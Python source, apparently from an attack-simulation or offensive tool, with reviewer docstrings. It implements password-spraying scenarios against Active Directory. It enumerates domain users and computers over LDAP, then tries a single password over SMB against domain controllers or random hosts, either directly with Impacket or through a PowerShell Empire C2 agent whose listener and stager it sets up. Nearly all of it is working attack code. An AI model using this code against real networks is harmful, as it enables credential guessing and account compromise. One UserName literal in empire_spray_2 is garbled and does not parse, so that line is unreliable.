def execute_module_with_results(self,module_name, agent_name, module_options=None):
    """Run an Empire module on an agent and block until its result text arrives.

    Calls ``self.execute_module`` and, when the task was accepted, polls
    ``self.get_agent_results`` every 2 seconds for an ``AgentResults`` entry
    whose ``taskID`` matches the started task.

    Returns the ``results`` string of the matching entry once it looks
    complete, or ``None`` when ``execute_module`` returned a falsy value or
    reported ``success`` as ``False``.  Callers that pass the return value on
    must therefore be prepared for ``None``.

    NOTE(review): the polling loop has no timeout or retry bound; if the
    agent never reports a completed task this method blocks forever.
    Assumes ``execute_module`` returns a dict with ``msg``, ``success`` and
    ``taskID`` keys — TODO confirm against its definition.
    """
    r = self.execute_module(module_name, agent_name, module_options)
    if r:
        print_info("Msg: " + r['msg'])
        if r['success'] is not False:
            print_info("Waiting for results...")
            while True:
                for result in self.get_agent_results(agent_name)['results']:
                    # Reset per result bucket so a completion seen for one
                    # bucket cannot leak into the next one.
                    done = False
                    if len(result) > 0:
                        for entry in result['AgentResults']:
                            if entry['taskID'] == r['taskID']:
                                # Empire does not give uniform output for every module,
                                # so completion is detected per module by content:
                                # get_domain_sid never prints a "completed" marker, so a
                                # SID prefix in the output is treated as completion.
                                if module_name == 'powershell/management/get_domain_sid':
                                    if 'S-1-5-21' in entry['results']:
                                        done = True
                                # Other modules first report "Job started: ..." and only
                                # later an entry containing " completed".
                                if ' completed' in entry['results']:
                                    done = True
                                if done == True:
                                    return entry['results']
                # `sleep` here is the bare name; it is not imported in this view,
                # so it presumably comes from a `from time import sleep` above.
                sleep(2)
def __init__(self,host,port,username,password):
    """Open a session against an Empire REST API server.

    Stores ``host``, ``port`` and an ``https://host:port`` ``base_url``,
    logs in through ``self.login`` and keeps the returned token as
    ``self.token['token']``.  When login yields a token, a listener and a
    stager are created through ``self.get_listener`` and
    ``self.generate_stager``; when it yields ``None`` those two attributes
    are never set.

    NOTE(review): only the scheme is visible here; whether the TLS
    certificate is verified depends on the request helpers defined
    elsewhere — confirm before relying on the ``https`` in ``base_url``.
    """
    endpoint = "{}:{}".format(host, str(port))
    print_info("Connecting to Empire REST API Server on " + endpoint + "....")
    self.host = host
    self.port = port
    self.base_url = "https://" + endpoint
    token = self.login(host, username, password)
    self.token = {'token': token}
    if token is None:
        # Login failed: leave listener/stager unset, as the original did.
        return
    print_status("Successfully connected to Empire server " + host)
    print_info("Starting Http Listener...")
    self.listener = self.get_listener()
    self.stager = self.generate_stager()
def impacket_spray_3(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True):
    """Impacket scenario 3: one authentication attempt per randomly chosen host.

    Picks up to ``nusers`` users (domain users via ``get_users`` when
    ``UseDomainAct`` is true, otherwise generated names) and ``nusers``
    computers via ``get_computers``, filters the computers with
    ``get_live_hosts`` and then calls ``smb_login`` once per (user, host)
    pair, pairing by index.  ``sleep`` is a pause in seconds handed to
    ``smb_login``; it is not ``time.sleep`` in this function.

    Returns ``None`` in every case; on an early exit it only prints an error.

    NOTE(review): ``random.sample`` on a ``set`` raises ``TypeError`` on
    Python 3.11+, and the bare ``except`` below turns that (and any LDAP or
    authentication failure) into the misleading "Did not find enough users"
    message.  Narrowing to ``ValueError`` and passing ``list(...)`` would
    separate the cases.
    """
    ## Against several random hosts on the domain. One authentication per host.
    if UseDomainAct:
        print_info("Querying for domain users with badPwdCount>=3...")
        try:
            users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
        except:
            # Bare except: also hides connection/credential errors from get_users.
            print_error("Did not find enough users, try a lower Nusers value")
            return
        print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...")
    else:
        users = generate_random_users(nusers)
        print_info("Using " + str(len(users)) + " randomly generated usernames (mimicking local accounts) ...")
    print_info("Querying for domain computers that authenticated within the last day...")
    try:
        computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers)
    except:
        # Same bare-except caveat as above.
        print_error("Did not find enough computers, try a lower Nusers value")
        return
    print_status("Obtained " + str(len(computers)) + " computers.")
    print_info("Identifying live hosts ...")
    computers = get_live_hosts(domain, computers, dc_ip)
    print_status("Using " + str(len(computers)) + " randomly picked domain computers for the spray...")
    if sleep > 0:
        print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
    # get_live_hosts may drop computers; truncate users so computers[idx] below
    # cannot run past the end of the list.
    if nusers > len(computers):
        users = users[:len(computers)]
    for idx, user in enumerate(users):
        # Conditional expression used purely for its side effect (the call).
        smb_login(domain, user, spraypassword, computers[idx], sleep) if UseDomainAct else smb_login("", user, spraypassword, computers[idx], sleep)
def empire_spray_2(empiresession, agentid, duser, dpass, domain, dc_ip, nusers, spraypassword, sleep, UseDomainAct=True, UseKerberos=True):
    """Empire scenario 2: every username against one randomly chosen host.

    Samples ``nusers`` computers via ``get_computers``, keeps the live ones,
    picks one at random and runs the Empire ``smblogin`` module on
    ``agentid`` with a comma-joined ``UserName`` list.  ``UseKerberos``
    selects ``host[0]`` as the target name, otherwise ``host[1]`` (the two
    elements are presumably hostname and address — confirm against
    ``get_live_hosts``).  The module result is handed to
    ``process_empire_results``.

    Returns ``None``; early exits only print an error.

    NOTE(review): ``random.choice(computers)`` raises ``IndexError`` when
    ``get_live_hosts`` returns an empty list, which is not caught here.
    NOTE(review): in the ``UseDomainAct=False`` branch the ``users`` list
    from ``generate_random_users(nusers)`` is built and then discarded —
    each element is replaced by ``generate_random_users(10)[0]``.
    NOTE(review): ``execute_module_with_results`` can return ``None`` when
    the module was rejected; ``process_empire_results`` then receives
    ``None`` — confirm it tolerates that.
    NOTE(review): the ``'UserName'`` value in ``module_options`` reads as
    ``"******"" + usernames + "\\""`` in this copy, which is not valid Python;
    the literal looks garbled in this listing and should be checked against
    the original file before this function is assumed to parse.
    """
    ## Against one random host on the domain
    print_info("Querying for domain computers that authenticated within the last day...")
    try:
        computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers)
    except:
        # Bare except: also hides connection/credential errors from get_computers.
        print_error("Did not find enough computers, try a lower Nusers value")
        return
    print_status("Obtained " + str(len(computers)) + " computers.")
    print_info("Identifying live hosts ...")
    computers = get_live_hosts(domain,computers,dc_ip)
    host = random.choice(computers)
    print_status("Randomly picked domain computer : " + host[0] + " - " + host[1])
    computername = host[0] if UseKerberos else host[1]
    if UseDomainAct:
        print_info("Querying for domain users with badPwdCount>=3...")
        try:
            users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
        except:
            # Same bare-except caveat; random.sample on a set also fails on 3.11+.
            print_error("Did not find enough users, try a lower Nusers value")
            return
        print_status("Using " + str(len(users)) + " randomly picked domain users for the spray.")
    else:
        users = generate_random_users(nusers)
        print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...")
    usernames = []
    for user in users:
        usernames.append(user if UseDomainAct else generate_random_users(10)[0])
    usernames = ",".join(usernames)
    if sleep > 0:
        print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
    # Here the per-attempt pause is delegated to the module via the 'Sleep' option.
    module_options = {'UserName': "******"" + usernames + "\"", 'ComputerName': computername, 'Password': spraypassword, 'Domain': domain, 'Sleep':str(sleep)} if UseDomainAct else {'UserName': "******"" + usernames + "\"", 'Domain':'', 'ComputerName': computername, 'Password': spraypassword,'Sleep':str(sleep)}
    results=empiresession.execute_module_with_results("powershell/situational_awareness/network/smblogin", agentid, module_options)
    print_status("Obtained results from the Powershell Empire agent")
    process_empire_results(results,host)
def impacket_spray_1(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True, ):
    """Impacket scenario 1: the whole username list against one domain controller.

    Resolves DCs with ``get_dcs``, keeps the live ones, picks one at random
    and calls ``smb_login`` once with the full ``users`` list.  Note that
    here ``smb_login`` receives a list, whereas ``impacket_spray_3`` passes
    one user per call — ``smb_login`` presumably accepts both; confirm.

    Returns ``None``; on too few users it prints an error and exits.

    NOTE(review): ``random.choice(dcs)`` raises ``IndexError`` when no DC is
    live; nothing catches that here.
    """
    ## Against the DC
    print_info("Querying for Domain Controllers...")
    dcs =get_dcs(duser, dpass, domain, dc_ip)
    dcs = get_live_hosts(domain,dcs,dc_ip)
    dc = random.choice(dcs)
    print_status("Randomly picked DC : "+dc[0]+" - "+dc[1])
    if UseDomainAct:
        print_info("Querying for domain users with badPwdCount>=3...")
        try:
            users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
        except:
            # Bare except: also hides LDAP/credential errors, and the
            # TypeError random.sample raises for a set on Python 3.11+.
            print_error("Did not find enough users, try a lower Nusers value")
            return
        print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...")
        if sleep > 0:
            print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
        smb_login(domain, users, spraypassword, dc, sleep)
    else:
        users = generate_random_users(nusers)
        print_info("Using "+str(len(users))+" randomly generated usernames (mimic local account usage) ...")
        if sleep > 0:
            print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
        # Empty domain: generated names are tried as local accounts.
        smb_login("", users, spraypassword, dc, sleep)
def empire_spray_3(empiresession, agentid, duser, dpass, domain, dc_ip, nusers, spraypassowrd, sleep, UseDomainAct=True, UseKerberos=True):
    """Empire scenario 3: one module execution per (user, host) pair.

    Samples users and computers like ``impacket_spray_3``, then runs the
    Empire ``smblogin`` module once per index with a single ``UserName`` and
    ``'Sleep': '0'``; the pause between attempts is done in this function
    with ``time.sleep`` rather than inside the module.

    Returns ``None``; early exits only print an error.

    NOTE(review): the parameter is spelled ``spraypassowrd``; renaming it
    would break any caller passing it by keyword, so it is left as is.
    NOTE(review): the loop rebinds ``duser`` — the credential used for the
    LDAP queries above — to the current spray username.  Harmless today
    because ``duser`` is not read again afterwards, but a different local
    name would avoid the trap.
    NOTE(review): ``execute_module_with_results`` may return ``None`` when
    the module is rejected; ``process_empire_results`` then receives
    ``None`` — confirm it tolerates that.
    """
    ## Against several random hosts on the domain. One authentication per host.
    if UseDomainAct:
        print_info("Querying for domain users with badPwdCount>=3...")
        try:
            users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
        except:
            # Bare except: also hides LDAP/credential errors, and the
            # TypeError random.sample raises for a set on Python 3.11+.
            print_error("Did not find enough users, try a lower Nusers value")
            return
        print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...")
    else:
        users = generate_random_users(nusers)
        print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...")
    print_info("Querying for domain computers that authenticated within the last day...")
    try:
        computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers)
    except:
        # Same bare-except caveat as above.
        print_error("Did not find enough computers, try a lower Nusers value")
        return
    print_status("Obtained " + str(len(computers)) + " computers.")
    print_info("Identifying live hosts ...")
    computers=get_live_hosts(domain,computers,dc_ip)
    print_status("Using " + str(len(computers)) + " randomly picked domain computers for the spray...")
    if sleep > 0:
        print_status("Sleeping " + str((sleep)) + " seconds between each empire module execution...")
    # get_live_hosts may drop computers; truncate users so computers[idx]
    # below cannot run past the end of the list.
    if nusers > len(computers):
        users = users[:len(computers)]
    for idx, user in enumerate(users):
        duser = user if UseDomainAct else generate_random_users(1)[0]
        # Element 0 vs 1 of a host tuple, selected by UseKerberos as in empire_spray_2.
        computername = computers[idx][0] if UseKerberos else computers[idx][1]
        module_options = {'UserName': duser, 'ComputerName': computername, 'Password': spraypassowrd, 'Domain': domain,'Sleep':'0'} if UseDomainAct else {'UserName': duser,'Domain':'', 'ComputerName': computername, 'Password': spraypassowrd,'Sleep':'0'}
        results = empiresession.execute_module_with_results("powershell/situational_awareness/network/smblogin", agentid, module_options)
        print_status("Obtained results from the Powershell Empire agent")
        process_empire_results(results,computers[idx])
        # In this scenario the pause is applied here instead of inside Invoke-SMBLogin.
        # `time` is not imported in this view; presumably `import time` exists above.
        if sleep > 0 :
            time.sleep(sleep)
def impacket_spray_2(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True):
    """Impacket scenario 2: the whole username list against one random member host.

    Samples ``nusers`` computers via ``get_computers``, keeps the live ones,
    picks one at random and calls ``smb_login`` once with the full ``users``
    list (domain users from ``get_users`` when ``UseDomainAct`` is true,
    otherwise generated names with an empty domain).

    Returns ``None``; early exits only print an error.

    NOTE(review): ``random.choice(computers)`` raises ``IndexError`` when
    ``get_live_hosts`` returns an empty list; nothing catches that here.
    """
    ## Against one random host on the domain
    print_info("Querying for domain computers that authenticated within the last day...")
    try:
        computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers)
    except:
        # Bare except: also hides LDAP/credential errors, and the
        # TypeError random.sample raises for a set on Python 3.11+.
        print_error("Did not find enough computers, try a lower Nusers value")
        return
    print_status("Obtained " + str(len(computers)) + " computers.")
    print_info("Identifying live hosts ...")
    computers=get_live_hosts(domain,computers,dc_ip)
    host = random.choice(computers)
    print_status("Randomly picked domain computer : " + host[0] + " - " + host[1])
    if UseDomainAct:
        print_info("Querying for domain users with badPwdCount>=3...")
        try:
            users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
        except:
            # Same bare-except caveat as above.
            print_error("Did not find enough users, try a lower Nusers value")
            return
        print_status("Using " + str(len(users)) + " randomly picked domain users for the spray.")
        if sleep > 0:
            print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
        smb_login(domain, users, spraypassword, host, sleep)
    else:
        users = generate_random_users(nusers)
        print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...")
        if sleep > 0:
            print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
        # Empty domain: generated names are tried as local accounts.
        smb_login("", users, spraypassword, host, sleep)